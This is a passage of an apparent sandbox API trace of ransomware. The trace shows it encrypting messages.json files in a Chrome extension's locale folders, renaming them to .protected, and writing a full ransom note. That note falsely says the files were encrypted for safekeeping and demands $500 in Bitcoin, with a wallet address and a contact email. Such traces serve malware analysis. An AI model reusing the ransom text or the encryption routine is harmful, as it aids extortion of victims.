(lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\he\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\he\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x168 [0079.350] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\he\\messages.json") returned 156 [0079.350] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0079.350] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User 
Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\he\\messages.json") returned 156 [0079.350] StrStrW (lpFirst="messages.json", lpSrch=".rar") returned 0x0 [0079.350] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\he\\messages.json") returned 156 [0079.350] StrStrW (lpFirst="messages.json", lpSrch=".zip") returned 0x0 [0079.350] ReadFile (in: hFile=0x168, lpBuffer=0xd11128, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesRead=0x295d914*=0x116, lpOverlapped=0x0) returned 1 [0079.351] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0xfffffeea, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0079.351] WriteFile (in: hFile=0x168, lpBuffer=0xd11128*, nNumberOfBytesToWrite=0x116, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesWritten=0x295d914*=0x116, lpOverlapped=0x0) returned 1 [0079.351] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0079.351] WriteFile (in: hFile=0x168, lpBuffer=0x295d8ec*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x295d8ec*, lpNumberOfBytesWritten=0x295d914*=0x4, lpOverlapped=0x0) returned 1 [0079.351] WriteFile (in: hFile=0x168, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295d914*=0x30, lpOverlapped=0x0) returned 1 [0079.351] CloseHandle (hObject=0x168) returned 1 [0079.351] wnsprintfW (in: pszDest=0xd11128, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User 
Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\he\\messages.json.protected") returned 166 [0079.351] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\he\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\he\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\he\\messages.json.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\he\\messages.json.protected")) returned 1 [0079.352] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0 [0079.352] FindClose (in: hFindFile=0x47bc10 | out: hFindFile=0x47bc10) returned 1 [0079.352] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\he\\RESTORE_FILES.txt") returned 160 [0079.352] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\he\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\he\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x164 [0079.352] lstrlenA 
(lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0079.352] WriteFile (in: hFile=0x164, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295d914*=0x53d, lpOverlapped=0x0) returned 1 [0079.353] lstrlenA (lpString="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") returned 684 [0079.353] WriteFile (in: hFile=0x164, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295d914*=0x2ac, lpOverlapped=0x0) 
returned 1 [0079.353] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0079.353] WriteFile (in: hFile=0x164, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295d914*=0xb1, lpOverlapped=0x0) returned 1 [0079.354] CloseHandle (hObject=0x164) returned 1 [0079.354] FindNextFileW (in: hFindFile=0x47bbd0, lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 1 [0079.354] lstrcmpiW (lpString1="hi", lpString2="Windows") returned -1 [0079.354] lstrcmpiW (lpString1="hi", lpString2="Program Files") returned -1 [0079.354] lstrcmpiW (lpString1="hi", lpString2="Program Files (x86)") returned -1 [0079.354] lstrcmpiW (lpString1="hi", lpString2="$Recycle.bin") returned 1 [0079.354] lstrcmpiW (lpString1="hi", lpString2="System Volume Information") returned -1 [0079.354] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\hi") returned 142 [0079.354] lstrcmpW (lpString1="hi", lpString2=".") returned 1 [0079.354] lstrcmpW (lpString1="hi", lpString2="..") returned 1 [0079.354] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\hi\\*") returned 144 [0079.354] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\hi\\*", lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0x47bc10 [0079.354] 
lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0079.354] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0079.354] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0079.354] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0079.354] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0079.354] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\hi\\.") returned 144 [0079.354] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0079.354] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0079.354] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0079.354] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0079.355] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0079.355] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0079.355] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0079.355] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\hi\\..") returned 145 [0079.355] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0079.355] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0079.355] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0079.355] lstrcmpiW (lpString1="messages.json", lpString2="Windows") returned -1 [0079.355] lstrcmpiW (lpString1="messages.json", lpString2="Program Files") returned -1 [0079.355] lstrcmpiW (lpString1="messages.json", lpString2="Program Files (x86)") 
returned -1 [0079.355] lstrcmpiW (lpString1="messages.json", lpString2="$Recycle.bin") returned 1 [0079.355] lstrcmpiW (lpString1="messages.json", lpString2="System Volume Information") returned -1 [0079.355] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\hi\\messages.json") returned 156 [0079.355] StrStrIW (lpFirst="messages.json", lpSrch=".protected") returned 0x0 [0079.355] lstrcmpW (lpString1="messages.json", lpString2="RESTORE_FILES.txt") returned -1 [0079.355] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295d8cc | out: pbBuffer=0x295d8cc) returned 1 [0079.355] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x30) returned 1 [0079.355] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\hi\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\hi\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x168 [0079.355] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\hi\\messages.json") returned 156 [0079.355] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0079.355] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User 
Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\hi\\messages.json") returned 156 [0079.355] StrStrW (lpFirst="messages.json", lpSrch=".rar") returned 0x0 [0079.356] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\hi\\messages.json") returned 156 [0079.356] StrStrW (lpFirst="messages.json", lpSrch=".zip") returned 0x0 [0079.356] ReadFile (in: hFile=0x168, lpBuffer=0xd11128, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesRead=0x295d914*=0x159, lpOverlapped=0x0) returned 1 [0079.356] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0xfffffea7, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0079.357] WriteFile (in: hFile=0x168, lpBuffer=0xd11128*, nNumberOfBytesToWrite=0x159, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesWritten=0x295d914*=0x159, lpOverlapped=0x0) returned 1 [0079.357] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0079.357] WriteFile (in: hFile=0x168, lpBuffer=0x295d8ec*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x295d8ec*, lpNumberOfBytesWritten=0x295d914*=0x4, lpOverlapped=0x0) returned 1 [0079.357] WriteFile (in: hFile=0x168, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295d914*=0x30, lpOverlapped=0x0) returned 1 [0079.357] CloseHandle (hObject=0x168) returned 1 [0079.357] wnsprintfW (in: pszDest=0xd11128, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User 
Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\hi\\messages.json.protected") returned 166 [0079.357] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\hi\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\hi\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\hi\\messages.json.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\hi\\messages.json.protected")) returned 1 [0079.358] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0 [0079.358] FindClose (in: hFindFile=0x47bc10 | out: hFindFile=0x47bc10) returned 1 [0079.358] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\hi\\RESTORE_FILES.txt") returned 160 [0079.358] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\hi\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\hi\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x164 [0079.358] lstrlenA 
(lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0079.358] WriteFile (in: hFile=0x164, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295d914*=0x53d, lpOverlapped=0x0) returned 1 [0079.359] lstrlenA 
(lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0079.359] WriteFile (in: hFile=0x164, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295d914*=0x2ac, lpOverlapped=0x0) returned 1 [0079.359] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0079.359] WriteFile (in: hFile=0x164, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295d914*=0xb1, lpOverlapped=0x0) returned 1 [0079.359] CloseHandle (hObject=0x164) returned 1 [0079.359] FindNextFileW (in: hFindFile=0x47bbd0, lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 1 [0079.359] lstrcmpiW (lpString1="hr", lpString2="Windows") returned -1 [0079.359] lstrcmpiW (lpString1="hr", lpString2="Program Files") returned -1 [0079.360] lstrcmpiW (lpString1="hr", lpString2="Program Files (x86)") returned -1 [0079.360] lstrcmpiW (lpString1="hr", lpString2="$Recycle.bin") returned 1 [0079.360] lstrcmpiW (lpString1="hr", lpString2="System Volume Information") returned -1 [0079.360] wnsprintfW 
(in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\hr") returned 142 [0079.360] lstrcmpW (lpString1="hr", lpString2=".") returned 1 [0079.360] lstrcmpW (lpString1="hr", lpString2="..") returned 1 [0079.360] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\hr\\*") returned 144 [0079.360] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\hr\\*", lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0x47bc10 [0079.360] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0079.360] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0079.360] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0079.360] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0079.360] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0079.360] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\hr\\.") returned 144 [0079.360] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0079.360] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0079.360] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0079.360] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0079.360] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 
[0079.360] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0079.360] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0079.360] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\hr\\..") returned 145 [0079.360] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0079.360] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0079.360] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0079.360] lstrcmpiW (lpString1="messages.json", lpString2="Windows") returned -1 [0079.361] lstrcmpiW (lpString1="messages.json", lpString2="Program Files") returned -1 [0079.361] lstrcmpiW (lpString1="messages.json", lpString2="Program Files (x86)") returned -1 [0079.361] lstrcmpiW (lpString1="messages.json", lpString2="$Recycle.bin") returned 1 [0079.361] lstrcmpiW (lpString1="messages.json", lpString2="System Volume Information") returned -1 [0079.361] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\hr\\messages.json") returned 156 [0079.361] StrStrIW (lpFirst="messages.json", lpSrch=".protected") returned 0x0 [0079.361] lstrcmpW (lpString1="messages.json", lpString2="RESTORE_FILES.txt") returned -1 [0079.361] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295d8cc | out: pbBuffer=0x295d8cc) returned 1 [0079.361] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x30) returned 1 [0079.361] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS 
HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\hr\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\hr\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x168 [0079.362] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\hr\\messages.json") returned 156 [0079.362] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0079.362] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\hr\\messages.json") returned 156 [0079.362] StrStrW (lpFirst="messages.json", lpSrch=".rar") returned 0x0 [0079.362] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\hr\\messages.json") returned 156 [0079.362] StrStrW (lpFirst="messages.json", lpSrch=".zip") returned 0x0 [0079.362] ReadFile (in: hFile=0x168, lpBuffer=0xd11128, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesRead=0x295d914*=0x107, lpOverlapped=0x0) returned 1 [0079.363] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0xfffffef9, lpNewFilePointer=0xffffffff, 